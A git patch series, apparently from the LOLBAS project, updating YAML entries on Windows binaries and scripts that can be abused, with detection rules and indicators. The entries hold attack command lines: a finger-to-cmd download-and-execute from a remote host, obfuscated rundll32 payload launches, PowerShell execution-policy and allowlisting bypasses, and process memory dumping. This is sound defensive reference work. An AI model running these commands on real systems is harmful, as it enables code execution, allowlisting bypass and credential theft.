https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index a1b6052..19fb508 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1127 - OperatingSystem: Windows 10 2004 + OperatingSystem: Windows 10 2004 and above, Windows 11 - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator MitreID: T1127 - OperatingSystem: Windows 10 1909 + OperatingSystem: Windows 10 1909 and below Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 2e8ee54..fa6a26d 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: Administrator MitreID: T1127 - OperatingSystem: Windows 10 1809 and newer + OperatingSystem: Windows 10 1809 and newer, Windows 11 - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID Category: Dump Privileges: Administrator MitreID: T1003 - OperatingSystem: Windows 10 1809 and newer + OperatingSystem: Windows 10 1809 and newer, Windows 11 Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe From 085aaa37b191be00bf0657a1824ef21849d4cc06 Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 15 Dec 2021 11:46:04 +0000 Subject: [PATCH 05/11] Adding more missed-out entries --- yml/OSBinaries/Finger.yml | 62 +++++++-------- .../Microsoft.Workflow.Compiler.yml | 6 +- yml/OSBinaries/Mmc.yml | 2 +- yml/OSBinaries/Schtasks.yml | 4 +- yml/OSLibraries/Ieframe.yml | 2 +- yml/OSLibraries/Mshtml.yml | 2 +- yml/OSLibraries/Pcwutl.yml | 2 +- yml/OSLibraries/Setupapi.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 2 +- yml/OSLibraries/Syssetup.yml | 4 +- yml/OSLibraries/Url.yml | 12 +-- yml/OSLibraries/Zipfldr.yml | 4 +- yml/OSLibraries/comsvcs.yml | 2 +- yml/OSScripts/CL_LoadAssembly.yml | 48 ++++++------ yml/OSScripts/UtilityFunctions.yml | 48 ++++++------ yml/OtherMSBinaries/Fsi.yml | 78 +++++++++---------- yml/OtherMSBinaries/FsiAnyCpu.yml | 70 ++++++++--------- yml/OtherMSBinaries/Procdump.yml | 68 ++++++++-------- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 62 +++++++-------- yml/OtherMSBinaries/Wfc.yml | 56 ++++++------- 20 files changed, 268 insertions(+), 268 deletions(-) diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index e84d9d9..279454f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,31 +1,31 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' ---- +--- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml + - IOC: finger.exe should not be run on a normal workstation. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' +--- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d1f884..a2f0382 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -10,21 +10,21 @@ Commands: Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S, Windows 11 - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S, Windows 11 - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code Category: AWL Bypass Privileges: User MitreID: T1127 - OperatingSystem: Windows 10S + OperatingSystem: Windows 10S, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4bf70e8..4f31b21 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -17,7 +17,7 @@ Commands: Category: UAC Bypass Privileges: Administrator MitreID: T1218.014 - OperatingSystem: Windows 10 (and possibly earlier versions) + OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index a176de6..0f6d3d4 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1053.005 - OperatingSystem: Windows + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute Privileges: Administrator MitreID: T1053.005 - OperatingSystem: Windows 10, Windows 11 + OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index ba04167..c299470 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9483c3c..40850c9 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 1f47e38..657ea48 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 02264de..3779e7b 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -10,7 +10,7 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. UseCase: Load an executable payload. diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index f344462..2136e6b 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -10,7 +10,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 44a0bb4..078bf0d 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -10,14 +10,14 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index ea34df9..c744c09 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -10,42 +10,42 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d64c755..e10a771 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -10,14 +10,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 03596cf..7a9c41b 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -10,7 +10,7 @@ Commands: Category: Dump Privileges: SYSTEM MitreID: T1003.001 - OperatingSystem: Windows + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\comsvcs.dll Code_Sample: diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 1fdea2a..c9ca1ab 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -1,24 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index d5e07b3..6182256 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -1,24 +1,24 @@ ---- -Name: UtilityFunctions.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 -Full_Path: - - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: -Detection: -Resources: - - Link: https://twitter.com/nickvangilder/status/1441003666274668546 -Acknowledgement: - - Person: Nick VanGilder - Handle: '@nickvangilder' ---- +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 2adf80a..d056118 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -1,39 +1,39 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 54e1cf5..b0701fc 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -1,35 +1,35 @@ ---- -Name: FsiAnyCpu.exe -Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsianycpu.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 9d851cf..99c551d 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -1,34 +1,34 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 'Alfie Champion (@ajpc500)' -Created: 2020-10-14 -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Name: Alfie Champion - Handle: '@ajpc500' ---- +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: 2020-10-14 +Commands: + - Command: procdump.exe -md calc.dll explorer.exe + Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Name: Alfie Champion + Handle: '@ajpc500' +--- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index a32369a..7c897fe 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -1,31 +1,31 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: 